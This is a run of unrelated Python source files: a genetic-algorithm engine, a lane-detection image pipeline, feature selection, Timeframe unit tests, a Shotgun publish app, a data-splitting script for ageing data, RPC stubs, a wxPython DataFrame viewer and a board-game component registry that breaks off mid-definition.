Engine :rtype: True or False """ return self.max_time # ----------------------------------------------------------------- def bestIndividual(self): """ Returns the population best individual :rtype: the best individual """ return self.internalPop.bestRaw() # ----------------------------------------------------------------- def worstIndividual(self): """ Returns the population worst individual :rtype: the best individual """ return self.internalPop.worstRaw() # ----------------------------------------------------------------- def __gp_catch_functions(self, prefix): """ Internally used to catch functions with some specific prefix as non-terminals of the GP core """ import __main__ as mod_main function_set = {} main_dict = mod_main.__dict__ for obj, addr in main_dict.items(): if obj[0:len(prefix)] == prefix: try: op_len = addr.func_code.co_argcount except: continue function_set[obj] = op_len if len(function_set) <= 0: utils.raiseException("No function set found using function prefix '%s' !" % prefix, ValueError) self.setParams(gp_function_set=function_set) # ----------------------------------------------------------------- def initialize(self): """ This function initializes the GA Engine. Create and initialize the first population """ # Inform the user log.info("Initializing the GA engine ...") # Keep track of the time passed self.time_init = time() # Create the first population self.internalPop.create(minimax=self.minimax) # Initialize the population (initializes all individuals of the population) self.internalPop.initialize(ga_engine=self) # ----------------------------------------------------------------- def set_scores(self, scores, check=None): """ This function ... :param scores: :param check: :return: """ # Set the scores for the initial population if self.is_initial_generation: self.set_scores_for_population(self.internalPop, scores, check) # Set the scores for the new population else: # Set scores self.set_scores_for_population(self.new_population, scores, check) # Replace if self.new_population is not None: self.replace_internal_population() # Increment the current generation number self.currentGeneration += 1 # Sort the internal population self.internalPop.sort() # Set new pop to None self.new_population = None # ----------------------------------------------------------------- def set_scores_for_population(self, population, scores, check=None): """ This function ... :param population: :param scores: :param check: :return: """ index = 0 for individual in population: if check is not None: # Get the parametr values for this individual parameter_a = individual.genomeList[0] parameter_b = individual.genomeList[1] parameter_a_check = check["Parameter a"][index] parameter_b_check = check["Parameter b"][index] rel_diff_a = abs((parameter_a - parameter_a_check) / parameter_a) rel_diff_b = abs((parameter_b - parameter_b_check) / parameter_b) assert np.isclose(parameter_a, parameter_a_check, rtol=1e-11), rel_diff_a assert np.isclose(parameter_b, parameter_b_check, rtol=1e-11), rel_diff_b # Set the score individual.score = scores[index] # Increment the index index += 1 # ----------------------------------------------------------------- def get_population(self): """ Return the internal population of GA Engine :rtype: the population (:class:`GPopulation.GPopulation`) """ return self.internalPop # ----------------------------------------------------------------- def getStatistics(self): """ Gets the Statistics class instance of current generation :rtype: the statistics instance (:class:`Statistics.Statistics`) """ return self.internalPop.getStatistics() # ----------------------------------------------------------------- def generate_new_population(self): """ This function ... :return: """ # Inform the user log.info("Creating generation " + str(self.currentGeneration) + " ...") # Clone the current internal population newPop = GPopulation(self.internalPop) log.debug("Population was cloned.") size_iterate = len(self.internalPop) # Odd population size if size_iterate % 2 != 0: size_iterate -= 1 crossover_empty = self.select(popID=self.currentGeneration).crossover.isEmpty() for i in xrange(0, size_iterate, 2): genomeMom = self.select(popID=self.currentGeneration) genomeDad = self.select(popID=self.currentGeneration) if not crossover_empty and self.pCrossover >= 1.0: for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2): (sister, brother) = it else: if not crossover_empty and utils.randomFlipCoin(self.pCrossover): for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=2): (sister, brother) = it else: sister = genomeMom.clone() brother = genomeDad.clone() sister.mutate(pmut=self.pMutation, ga_engine=self) brother.mutate(pmut=self.pMutation, ga_engine=self) newPop.internalPop.append(sister) newPop.internalPop.append(brother) if len(self.internalPop) % 2 != 0: genomeMom = self.select(popID=self.currentGeneration) genomeDad = self.select(popID=self.currentGeneration) if utils.randomFlipCoin(self.pCrossover): for it in genomeMom.crossover.applyFunctions(mom=genomeMom, dad=genomeDad, count=1): (sister, brother) = it else: sister = prng.choice([genomeMom, genomeDad]) sister = sister.clone() sister.mutate(pmut=self.pMutation, ga_engine=self) newPop.internalPop.append(sister) # Return the new population #return newPop # NEW self.new_population = newPop # ----------------------------------------------------------------- def step(self): """ This function performs one step in the evolution, i.e. one generation """ # Inform the user log.info("Performing step in the evolutionary process ...") # Generate the new population ## NEW self.generate_new_population() # Evaluate print(self.generation_description) self.new_population.evaluate() # Replace population self.replace_internal_population() # Sort the population self.internalPop.sort() # Set new population to None self.new_population = None # Inform the user #log.success("The generation %d was finished.", self.currentGeneration) # Increment the current generation number self.currentGeneration += 1 if self.max_time: total_time = time() - self.time_init if total_time > self.max_time: return True return self.currentGeneration == self.nGenerations # ----------------------------------------------------------------- def replace_internal_population(self): """ This function ... :return: """ # Elitism: if self.elitism: self.do_elitism(self.new_population) # Set the new population as the internal population and sort it self.internalPop = self.new_population # ----------------------------------------------------------------- def do_elitism(self, new_population): """ This function ... :param new_population: :return: """ # Elitism concept has different meanings for metaheuristic and particular for GA. In general, elitism # is related with memory: "remember the best solution found" (kind of greedying). In the most traditional way, # for evolutionary algorithms (GA, EA, DE...), elitism implies the best solution found is used for to build the # next generation. Particularly, for GA it means keeping the best individual found intact for next generation. # In GA, there is something like a proof for multiobjective optimization (villalobos, coello and hernandez, 2005) # that linked convergence and elitism which is a kind of cool stuff. # # Elitism involves copying a small proportion of the fittest candidates, unchanged, into the next generation. # This can sometimes have a dramatic impact on performance by ensuring that the EA does not waste time # re-discovering previously discarded partial solutions. Candidate solutions that are preserved unchanged # through elitism remain eligible for selection as parents when breeding the remainder of the next generation. log.debug("Doing elitism ...") if self.getMinimax() == constants.minimaxType["maximize"]: for i in xrange(self.nElitismReplacement): ##re-evaluate before being sure this is the best # self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ? if self.internalPop.bestRaw(i).score > new_population.bestRaw(i).score: new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i) elif self.getMinimax() == constants.minimaxType["minimize"]: for i in xrange(self.nElitismReplacement): ##re-evaluate before being sure this is the best # self.internalPop.bestRaw(i).evaluate() # IS THIS REALLY NECESSARY ? if self.internalPop.bestRaw(i).score < new_population.bestRaw(i).score: new_population[len(new_population) - 1 - i] = self.internalPop.bestRaw(i) # ----------------------------------------------------------------- def printStats(self): """ Print generation statistics :rtype: the printed statistics as string .. versionchanged:: 0.6 The return of *printStats* method. """ percent = self.currentGeneration * 100 / float(self.nGenerations) message = "Gen. %d (%.2f%%):" % (self.currentGeneration, percent) log.info(message) print(message,) sys_stdout.flush() self.internalPop.statistics() stat_ret = self.internalPop.printStats() return message + stat_ret # ----------------------------------------------------------------- def printTimeElapsed(self): """ Shows the time elapsed since the begin of evolution """ total_time = time() - self.time_init print("Total time elapsed: %.3f seconds." % total_time) return total_time # ----------------------------------------------------------------- def dumpStatsDB(self): """ Dumps the current statistics to database adapter """ log.debug("Dumping stats to the DB Adapter") self.internalPop.statistics() self.dbAdapter.insert(self) # ----------------------------------------------------------------- def evolve(self, freq_stats=0): """ Do all the generations until the termination criteria, accepts the freq_stats (default is 0) to dump statistics at n-generation Example: >>> ga_engine.evolve(freq_stats=10) (...) :param freq_stats: if greater than 0, the statistics will be printed every freq_stats generation. :rtype: returns the best individual of the evolution .. versionadded:: 0.6 the return of the best individual """ # Initialize self.initialize_evolution() # Do the evolution loop self.evolve_loop(freq_stats) # Finish evolution, return best individual return self.finish_evolution() # ----------------------------------------------------------------- @property def is_initial_generation(self): """ This function ... :return: """ if self.new_population is None: if self.currentGeneration > 0: raise RuntimeError("Inconsistent state: 'new_population' does exist but 'currentGeneration' >0") return True else: return False # ----------------------------------------------------------------- @property def generation_description(self): """ This function ... :return: """ if self.is_initial_generation: return "Initial generation" else: return "Generation " + str(self.currentGeneration) # ----------------------------------------------------------------- def initialize_evolution(self): """ This function ... :return: """ self.initialize() # Inform the user ... log.info("Evaluating and sorting the initial population ...") # Evaluate and sort the internal population self.internalPop.evaluate() self.sort_internal_population() # ----------------------------------------------------------------- def sort_internal_population(self): """ This function ... :return: """ self.internalPop.sort() # ----------------------------------------------------------------- def evolve_loop(self, freq_stats): """ This function ... :return: """ log.debug("Starting loop over evolutionary algorithm.") while True: if not self.evolve_generation(freq_stats): break # ----------------------------------------------------------------- def finish_evolution(self, silent=True): """ This function ... :return: """ if not silent: self.printStats() self.printTimeElapsed() if self.dbAdapter: log.debug("Closing the DB Adapter") if not (self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0): self.dumpStatsDB() self.dbAdapter.commitAndClose() if self.migrationAdapter: log.debug("Closing the Migration Adapter") self.migrationAdapter.stop() return self.bestIndividual() # ----------------------------------------------------------------- def evolve_generation(self, freq_stats): """ This function ... :param freq_stats: :return: """ stopFlagCallback = False stopFlagTerminationCriteria = False if self.migrationAdapter: log.debug("Migration adapter: exchange") self.migrationAdapter.exchange() self.internalPop.clearFlags() self.internalPop.sort() if not self.stepCallback.isEmpty(): for it in self.stepCallback.applyFunctions(self): stopFlagCallback = it if not self.terminationCriteria.isEmpty(): for it in self.terminationCriteria.applyFunctions(self): stopFlagTerminationCriteria = it if freq_stats: if (self.currentGeneration % freq_stats == 0) or (self.getCurrentGeneration() == 0): self.printStats() if self.dbAdapter: if self.currentGeneration % self.dbAdapter.getStatsGenFreq() == 0: self.dumpStatsDB() if stopFlagTerminationCriteria: log.debug("Evolution stopped by the Termination Criteria !") if freq_stats: print("\n\tEvolution stopped by Termination Criteria function !\n") return False if stopFlagCallback: log.debug("Evolution stopped by Step Callback function !") if freq_stats: print("\n\tEvolution stopped by Step Callback function !\n") return False if self.step(): return False return True # ----------------------------------------------------------------- def select(self, **args): """ Select one individual from population :param args: this parameters will be sent to the selector """ for it in self.selector.applyFunctions(self.internalPop, **args): return it # -----------------------------------------------------------------
import numpy as np import cv2 import matplotlib.pyplot as plt import matplotlib.image as mpimg image = mpimg.imread('bridge_shadow.jpg') # Edit this function to create your own pipeline. def pipeline(img, s_thresh=(170, 255), sx_thresh=(20, 100)): img = np.copy(img) # Convert to HLS color space and separate the S channel # Note: img is the undistorted image hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS) s_channel = hls[:,:,2] # Grayscale image # NOTE: we already saw that standard grayscaling lost color information for the lane lines # Explore gradients in other colors spaces / color channels to see what might work better gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) # Sobel x sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) # Take the derivative in x abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx)) # Threshold x gradient thresh_min = 20 thresh_max = 100 sxbinary = np.zeros_like(scaled_sobel) sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1 # Threshold color channel s_thresh_min = 170 s_thresh_max = 255 s_binary = np.zeros_like(s_channel) s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1 # Stack each channel to view their individual contributions in green and blue respectively # This returns a stack of the two binary images, whose components you can see as different colors color_binary = np.dstack(( np.zeros_like(sxbinary), sxbinary, s_binary)) * 255 # Combine the two binary thresholds combined_binary = np.zeros_like(sxbinary) combined_binary[(s_binary == 1) | (sxbinary == 1)] = 1 return combined_binary result = pipeline(image) # Plot the result f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9)) f.tight_layout() ax1.imshow(image) ax1.set_title('Original Image', fontsize=40) ax2.imshow(result) ax2.set_title('Pipeline Result', fontsize=40) plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
from typing import NamedTuple import numpy as np from kneed import KneeLocator FeaturesSelection = NamedTuple( "FeaturesSelection", [ ("score", np.ndarray), ("index", np.ndarray), ("selection", np.ndarray), ("threshold", float), ], ) def _gradient(values: np.ndarray, order: int = 1) -> np.ndarray: result = values for _ in range(order): result = np.gradient(result) return result def _plateau_point(sorted_scores) -> int: gradient = np.abs(_gradient(sorted_scores)) is_plateau = gradient <= np.percentile(gradient, 1) plateau_points = np.nonzero(is_plateau)[0] return int(np.median(plateau_points)) def _knee_point(decreasing_segment: np.ndarray) -> int: locator = KneeLocator( x=np.arange(decreasing_segment.size, dtype=int), y=decreasing_segment, S=1.0, curve="convex", direction="decreasing", ) assert locator.knee is not None return locator.knee def select_features(feature_scores) -> FeaturesSelection: feature_scores = feature_scores.ravel() index = np.argsort(-feature_scores) score = feature_scores[index] plateau_point = _plateau_point(score) concave_up_segment = score[:plateau_point] knee_location = _knee_point(concave_up_segment) threshold = score[knee_location] selection = feature_scores >= threshold return FeaturesSelection(score, index, selection, threshold)
import unittest import numpy as np import pandas as pd from disarm_gears.frames import Timeframe # Inputs start_date = '2000-06-15' end_date = '2010-06-20' class TimeframeTests(unittest.TestCase): def test_inputs(self): # Check bad inputs self.assertRaises(AssertionError, Timeframe, start=start_date, length=0) self.assertRaises(AssertionError, Timeframe, start=start_date, length=3, step=.5) self.assertRaises(ValueError, Timeframe, start=start_date, length=3, step=1, by='x') self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=0) self.assertRaises(AssertionError, Timeframe, start=None, end=end_date, length=3, step=.5) self.assertRaises(ValueError, Timeframe, start=None, end=end_date, length=3, step=1, by='x') def test_outputs(self): # By day, length = 1 tf_00 = Timeframe(start=start_date, length=1, by='day') self.assertIsInstance(tf_00.knots_info, pd.DataFrame) self.assertEqual(tf_00.knots_info.shape[0], 1) #self.assertEqual(tf_00.knots_info.shape[1], 2)#TODO three columns if we add tag self.assertEqual(tf_00.start, tf_00.end) tf_01 = Timeframe(start=None, end=end_date, length=1, by='day') self.assertIsInstance(tf_01.knots_info, pd.DataFrame) self.assertEqual(tf_01.knots_info.shape[0], 1) #self.assertEqual(tf_01.knots_info.shape[1], 2) self.assertEqual(tf_01.start, tf_01.end) # By day, length = 2 tf_1 = Timeframe(start=start_date, length=2, by='day') self.assertIsInstance(tf_1.knots_info, pd.DataFrame) self.assertEqual(tf_1.knots_info.shape[0], 2) #self.assertEqual(tf_1.knots_info.shape[1], 2) self.assertEqual((tf_1.end - tf_1.start).days, 1) # By day, length = 1, step = 2 tf_2 = Timeframe(start=start_date, length=1, step=2, by='day') self.assertIsInstance(tf_2.knots_info, pd.DataFrame) self.assertEqual(tf_2.knots_info.shape[0], 1) #self.assertEqual(tf_2.knots_info.shape[1], 2) self.assertEqual((tf_2.end - tf_2.start).days, 1) # By month tf_30 = Timeframe(start=start_date, length=3, step=1, by='month') self.assertEqual(tf_30.knots_info.knot[0], 0) self.assertEqual(tf_30.knots_info.knot[2], 2) self.assertEqual(tf_30.knots_info.shape[0], 3) self.assertEqual(tf_30.knots_info.init_date[1], pd.to_datetime('2000-07-15')) self.assertEqual(tf_30.end, pd.to_datetime('2000-09-14')) tf_31 = Timeframe(start=None, end=end_date, length=3, step=1, by='month') self.assertEqual(tf_31.knots_info.knot[0], 0) self.assertEqual(tf_31.knots_info.knot[2], 2) self.assertEqual(tf_31.knots_info.shape[0], 3) # By year, step = 2 tf_4 = Timeframe(start=start_date, length=5, step=2, by='year') self.assertIsInstance(tf_4.knots_info, pd.DataFrame) self.assertEqual(tf_4.knots_info.shape[0], 5) self.assertEqual(tf_4.knots_info.init_date[3], pd.to_datetime('2006-06-15')) self.assertEqual(tf_4.end, pd.to_datetime('2010-06-14')) # By year, step = 2, start and end non None tf_5 = Timeframe(start=start_date, length=5, step=2, by='year', end=end_date) self.assertIsInstance(tf_5.knots_info, pd.DataFrame) self.assertEqual(tf_5.knots_info.shape[0], 5) self.assertEqual(tf_5.knots_info.init_date[3], pd.to_datetime('2006-06-15')) self.assertEqual(tf_5.end, pd.to_datetime('2010-06-14')) # By year, step = 2, start = None tf_6 = Timeframe(start=None, length=5, step=2, by='year', end=end_date) self.assertIsInstance(tf_6.knots_info, pd.DataFrame) self.assertEqual(tf_6.knots_info.shape[0], 5) self.assertEqual(tf_6.knots_info.init_date[3], pd.to_datetime('2006-06-21')) self.assertEqual(tf_6.start, pd.to_datetime('2000-06-21')) self.assertEqual(tf_6.end, pd.to_datetime(end_date)) def test_which_knots(self): tf_6 = Timeframe(start=start_date, length=10, step=7, by='day') dates = np.array(['2000-06-22', '2000-07-12', '2000-01-01', '2002-12-31', '2000-08-23', '2000-08-24']) ix = tf_6.which_knot(dates) self.assertEqual(ix.size, dates.size) self.assertIsInstance(ix, np.ndarray) self.assertEqual(ix[0], 1) self.assertEqual(ix[1], 3) self.assertEqual(ix[2], -1) self.assertEqual(ix[3], -1) self.assertEqual(ix[4], 9) self.assertEqual(ix[5], -1)
# Copyright (c) 2015 Shotgun Software Inc. # # CONFIDENTIAL AND PROPRIETARY # # This work is provided "AS IS" and subject to the Shotgun Pipeline Toolkit # Source Code License included in this distribution package. See LICENSE. # By accessing, using, copying or modifying this work you indicate your # agreement to the Shotgun Pipeline Toolkit Source Code License. All rights # not expressly granted therein are reserved by Shotgun Software Inc. """ Multi Publish """ import os import tank from tank import TankError class MultiPublish(tank.platform.Application): def init_app(self): """ Called as the application is being initialized """ tk_multi_publish = self.import_module("tk_multi_publish") self._publish_handler = tk_multi_publish.PublishHandler(self) # register commands: display_name = self.get_setting("display_name") # "Publish Render" ---> publish_render command_name = display_name.lower().replace(" ", "_") if command_name.endswith("..."): command_name = command_name[:-3] params = { "short_name": command_name, "title": "%s..." % display_name, "description": "Publishing of data into Shotgun", # dark themed icon for engines that recognize this format "icons": { "dark": { "png": os.path.join( os.path.dirname(__file__), "resources", "publish_menu_icon.png" ) } } } self.engine.register_command("%s..." % display_name, self._publish_handler.show_publish_dlg, params) @property def context_change_allowed(self): """ Specifies that context changes are allowed. """ return True def destroy_app(self): self.log_debug("Destroying tk-multi-publish") def copy_file(self, source_path, target_path, task): """ Utility method to copy a file from source_path to target_path. Uses the copy file hook specified in the configuration """ self.execute_hook("hook_copy_file", source_path=source_path, target_path=target_path, task=task) def post_context_change(self, old_context, new_context): """ Runs after a context change has completed. :param old_context: The sgtk.context.Context being switched from. :param new_context: The sgtk.context.Context being switched to. """ self._publish_handler.rebuild_primary_output()
import numpy as np import pandas as pd import argparse from numpy.random import RandomState from sklearn.preprocessing import StandardScaler, MinMaxScaler from sklearn.utils import resample parser = argparse.ArgumentParser() parser.add_argument('--dataset', type=str, default = 'elsa') args = parser.parse_args() """ Creates train, validation, and test sets """ def create_cv(): def create_data(index, full_data, deficits_val, medications_val, background_val, train = False, mean_deficits = 0, std_deficits = 0): chosen = X[index, 0] random_ids = dict(zip(chosen, np.random.rand(len(chosen)))) data = full_data.loc[full_data['id'].isin(chosen),['id', 'wave', 'age'] + deficits_val + medications_val + background_val + ['death age']] data['new ID'] = data.apply(lambda row: random_ids[int(row['id'])], axis = 1) data = data.sort_values(by = ['new ID','wave']) # scaling if train: mean_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol']) std_deficits = pd.Series(index = deficits_val+['height', 'bmi', 'alcohol']) for d in deficits_val+['height', 'bmi', 'alcohol']: mean_deficits[d] = data.loc[data[d]>-100,d].mean() std_deficits[d] = data.loc[data[d]>-100,d].std() else: for d in deficits_val+['height', 'bmi', 'alcohol']: data[d] = data[d].apply(lambda x: (x - mean_deficits[d])/std_deficits[d] if x > -100 else x) data = data[['id', 'wave', 'age'] + deficits_val + medications_val + background_val + ['death age'] ]#.values indexes = [] index_count = -1 previous_index = -100000 for i in range(len(data)): index = data.iloc[i,0] if(index != previous_index): index_count += 1 data.iloc[i,0] = index_count previous_index = index if train: return data, mean_deficits, std_deficits else: return data ran_state = RandomState(2) deficits = ['gait speed', 'grip dom', 'grip ndom', 'FI ADL', 'FI IADL', 'chair','leg raise', 'full tandem', 'srh', 'eye', 'hear', 'func', 'dias', 'sys', 'pulse', 'trig','crp','hdl','ldl','glucose','igf1','hgb','fib','fer', 'chol', 'wbc', 'mch', 'hba1c', 'vitd'] medications = ['BP med', 'anticoagulent med', 'chol med', 'hip/knee treat', 'lung/asthma med'] background = ['longill', 'limitact', 'effort', 'smkevr', 'smknow','height', 'bmi', 'mobility', 'country', 'alcohol', 'jointrep', 'fractures', 'sex', 'ethnicity'] if args.dataset == 'elsa': data = pd.read_csv('../Data/ELSA_cleaned.csv') postfix = '' print('Splitting ELSA dataset') elif args.dataset == 'sample': data = pd.read_csv('../Data/sample_data.csv') postfix = '_sample' print('Splitting sample dataset') else: print('unknown dataset') return 0 unique_indexes = data['id'].unique() data['censored'] = data['death age'].apply(lambda x: 0 if x > 0 else 1) censored = [] for id in unique_indexes: censored.append(data.loc[data['id'] == id, 'censored'].unique()[0]) X = np.array([unique_indexes, censored], int).T from sklearn.model_selection import StratifiedKFold skf_outer = StratifiedKFold(n_splits=5, shuffle = True, random_state = 2) skf_inner = StratifiedKFold(n_splits=5, shuffle = True, random_state = 3) for i, (full_train_index, test_index) in enumerate(skf_outer.split(X[:,0], X[:,1])): _, mean_deficits, std_deficits = create_data(np.arange(0,len(X[full_train_index,0]),dtype=int), data, deficits, medications, background, train=True) mean_deficits.to_csv('../Data/mean_deficits%s.txt'%postfix) std_deficits.to_csv('../Data/std_deficits%s.txt'%postfix) for j, (train_index, valid_index) in enumerate(skf_inner.split(X[full_train_index,0], X[full_train_index,1])): data_train = create_data(np.random.permutation(train_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits) #data_train.to_csv('Data/train_outer%d_inner%d.csv'%(i,j), index=False) data_train.to_csv('../Data/train%s.csv'%postfix, index=False) data_valid = create_data(np.random.permutation(valid_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits) #data_valid.to_csv('Data/valid_outer%d_inner%d.csv'%(i,j), index=False) data_valid.to_csv('../Data/valid%s.csv'%postfix, index=False) break # dont do full cv data_test = create_data(np.random.permutation(test_index), data, deficits, medications, background, mean_deficits = mean_deficits, std_deficits = std_deficits) #np.savetxt('Data/test_outer%d.txt'%i,data_test,fmt=s) data_test.to_csv('../Data/test%s.csv'%postfix,index=False) break # dont do full cv if __name__ =="__main__": create_cv()
from typing import Awaitable, Generic, List, Optional, TypeVar, Union from .data import RpcMethod as RpcMethodDecl from .data import Subscription as SubscriptionDecl from .data import Deserializer, Serializer, ServiceMethod EventPayload = TypeVar('EventPayload') RpcReqPayload = TypeVar('RpcReqPayload') RpcRespPayload = TypeVar('RpcRespPayload') class Stub: service = '' def __init__(self, sif) -> None: self.sif = sif class Rpc(Generic[RpcReqPayload, RpcRespPayload]): def __init__( self, stub: Stub, method: str, transport: Union[str, List[str]], req_serializer: Optional[Serializer]=None, req_deserializer: Optional[Deserializer]=None, resp_serializer: Optional[Serializer]=None, resp_deserializer: Optional[Deserializer]=None, ) -> None: self.stub = stub self.sif = stub.sif self.service = stub.service self.method = method self.transport = transport self.decl = RpcMethodDecl( self.service, self.method, self.transport, req_serializer=req_serializer, req_deserializer=req_deserializer, resp_serializer=resp_serializer, resp_deserializer=resp_deserializer, ) self.sif.add_decl(self.decl) def __call__(self, payload: RpcReqPayload) -> Awaitable[RpcRespPayload]: return self.call(payload) async def call(self, payload: RpcReqPayload) -> RpcRespPayload: call = self.sif.create_rpc_call( self.service, self.method, payload, ) await self.sif.call(call) return await call.fut def listen( self, func: ServiceMethod[RpcReqPayload, RpcRespPayload], ) -> None: self.sif.add_rpc_method(self.decl, func) class Sub(Generic[EventPayload]): def __init__( self, stub: Stub, topic: str, transport: Union[str, List[str]], serializer: Optional[Serializer]=None, deserializer: Optional[Deserializer]=None ) -> None: self.stub = stub self.sif = stub.sif self.service = stub.service self.topic = topic self.transport = transport self.decl = SubscriptionDecl( self.service, self.topic, self.transport, serializer=serializer, deserializer=deserializer, ) self.sif.add_decl(self.decl) def __call__(self, payload: EventPayload) -> Awaitable[None]: return self.call(payload) async def call(self, payload: EventPayload) -> None: event = self.sif.create_event(self.service, self.topic, payload) await self.sif.push(event) def listen(self, func: ServiceMethod[EventPayload, None]): self.sif.add_subscriber(self.decl, func)
import os from dotenv import load_dotenv load_dotenv(override=True) API_TOKEN = os.getenv("API_TOKEN") ACCESS_ID = os.getenv("ACCESS_ID")
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __title__ = 'DataViewer' __author__ = 'Tanner S Eastmond' __contact__ = 'https://github.com/tseastmond' __license__ = 'MIT' import pandas as pd import wx import wx.lib.mixins.listctrl as listmix from _data import _data from _pagetwo import _pagetwo from _pagethree import _pagethree ############################################################################### ############################################################################### ############################################################################### class DataViewer(wx.Frame): ''' This class is a data viewer for Pandas DataFrames that allows the user to view, filter, and calculate summary statistics for each column. ''' ########################################################################### ########################################################################### def __init__(self, df, rows=100): ''' This class is a data viewer for Pandas DataFrames that allows the user to view, filter, and calculate summary statistics for each column. Parameters ---------- df : Pandas DataFrame The data to view. rows : int Number of rows to show simultaneously. ''' # Initialize the app. print('initializing') self.app = wx.App() print('done') # Set up the actual frame. wx.Frame.__init__(self, None, title='Pandas DataFrame Viewer') # Make a panel and a notebook. panel = wx.Panel(self) notebook = wx.Notebook(panel) # Set up the pages. page1 = _data(notebook, df, rows) page2 = _pagetwo(notebook) page3 = _pagethree(notebook) # Actually add the pages. notebook.AddPage(page1,'Data') notebook.AddPage(page2,'Page 2') notebook.AddPage(page3,'Page 3') # Size the notebook correctly. sizer = wx.BoxSizer() sizer.Add(notebook, 1, wx.EXPAND) panel.SetSizer(sizer) # Set a status bar. self.CreateStatusBar(1) self.SetStatusText('{0} Columns, {1} Rows'.format(len(df.columns), page1.list.GetItemCount())) # Ensure the app closes when exit button is clicked. closeBtn = wx.Button(panel, label="Close") closeBtn.Bind(wx.EVT_BUTTON, self.onClose) # Show and loop. self.Show() self.app.MainLoop() # Delete the app. del self.app ########################################################################### ########################################################################### def onClose(self, event): self.Destroy() ############################################################################### ############################################################################### ############################################################################### if __name__ == '__main__': df = pd.read_csv(r'C:\Users\tanne\OneDrive\Python\san_diego_unified\principals\clean.csv', encoding='latin') df.head() df.iloc[-2] df.tail() DataViewer(df, rows=-100)
# encoding: utf-8 from typing import List, Dict import math from collections import OrderedDict import json ATTRS_IN_ORDER = [ "name", # display "top", "left", "height", "width", "color", "textColor", "showImage", "text", "text_ja", "textAlign", "image", "faceupImage", "faceupText", "faceupText_ja", "facedownImage", "facedownText", "facedownText_ja", "counterValue", # behavior "handArea", "draggable", "flippable", "ownable", "resizable", "rollable", "traylike", "counter", 'boxOfComponents', 'cardistry', 'positionOfBoxContents', 'stowage', "onAdd", 'toolboxFunction', 'editable', # current status "owner", "faceup", "zIndex", ] def in_order(component): result = OrderedDict() keys = set(component.keys()) for k in ATTRS_IN_ORDER: if k not in keys: continue result[k] = component[k] keys.remove(k) if len(keys) > 0: raise ValueError(f"component contains unknown keys: {keys}") return result class Box: def __init__(self, kit: 'Kit', box_component: Dict = None): self.kit: 'Kit' = kit self.box_component: Dict = box_component self.content_names: List[str] = [] def add_component(self, data, template=None): self.kit.registry.add_component(data, template=template) self.content_names.append(data['name']) @property def box_component(self): return self._box_component @box_component.setter def box_component(self, box_component): self._box_component = box_component if box_component: self.kit.registry.add_component(box_component) def use_components(self, components): for c in components: if type(c) == str: self.content_names.append(c) else: raise ValueError() class Kit: def __init__(self, registry: 'ComponentRegistry'): self.registry: 'ComponentRegistry' = registry self._description: Dict = {} self.direct_component_names: List[str] = [] self.boxes: List[Box] = [] def box(self, box_component=None) -> Box: box = Box(self, box_component) self.boxes.append(box) return box def add_component(self, data, template=None): self.registry.add_component(data, template=template) self.direct_component_names.append(data['name']) @property def description(self): return self._description @description.setter def description(self, value): self._description = value class ComponentRegistry: def __init__(self): self.components: List = [] self.kits: List[Kit] = [] def add_component(self, data, template=None): if template: completeData = template.copy() completeData.update(data) else: completeData = data.copy() for c in self.components: if c['name'] == completeData['name']: assert c == completeData break else: self.components.append(in_order(completeData)) def kit(self) -> Kit: kit = Kit(self) self.kits.append(kit) return kit def build_data_for_deploy(self): data_for_deploy = {} data_for_deploy['components'] = [{'component': c} for c in self.components] data_for_deploy['kits'] = [] for kit in self.kits: kit_data = kit.description.copy() used_component_names = set() used_component_names.update(kit.direct_component_names) kit_data['boxAndComponents'] = {} for direct_component_name in kit.direct_component_names: assert direct_component_name not in kit_data['boxAndComponents'] kit_data['boxAndComponents'][direct_component_name] = None for box in kit.boxes: box_name = box.box_component['name'] assert box_name not in kit_data['boxAndComponents'], f"kit_data {kit_data}" kit_data['boxAndComponents'][box_name] = box.content_names used_component_names.update([box_name] + box.content_names) data_for_deploy['kits'].append({'kit': kit_data}) kit_data['usedComponentNames'] = sorted(list(used_component_names)) # sort for stabilize test return data_for_deploy def generate_toolbox(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Toolbox", "label": "Toolbox", "label_ja": "道具箱", "width": "400px", "height": "300px" } box = kit.box({ "name": "Toolbox", "text": "Toolbox", "text_ja": "道具箱", "handArea": False, "top": "0px", "left": "0px", "height": "300px", "width": "460px", "color": "darkgray", "showImage": False, "draggable": True, "flippable": False, "resizable": True, "rollable": False, "ownable": False, "traylike": True, "boxOfComponents": True, "cardistry": ["collect"], "zIndex": 1, }) template = { "height": "100px", "width": "125px", "draggable": True, "flippable": False, "ownable": False, "resizable": True, "color": "cyan", "textColor": "black", } z_index = 100 offset = 0 card = { "name": "Export Table", "top": f"{int(offset / 3) * 110}px", "left": f"{(offset % 3) * 135 + 60}px", "text": "Export Table", "toolboxFunction": "export table", "zIndex": z_index, } box.add_component(card, template=template) z_index -= 1 offset += 1 card = { "name": "Upload Kit", "top": f"{int(offset / 3) * 110}px", "left": f"{(offset % 3) * 135 + 60}px", "text": "Upload Kit", "toolboxFunction": "upload kit", "zIndex": z_index, } box.add_component(card, template=template) z_index -= 1 offset += 1 def generate_note(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Note", "label": "Note", "label_ja": "メモ", "width": "100px", "height": "75" } kit.add_component({ "name": "Note", "handArea": False, "top": "0px", "left": "0px", "height": "75px", "width": "100px", "text": "(Double click to edit)", "color": '#feff9c', "textColor": 'black', "showImage": False, "draggable": True, "flippable": False, "resizable": True, "rollable": False, "ownable": False, 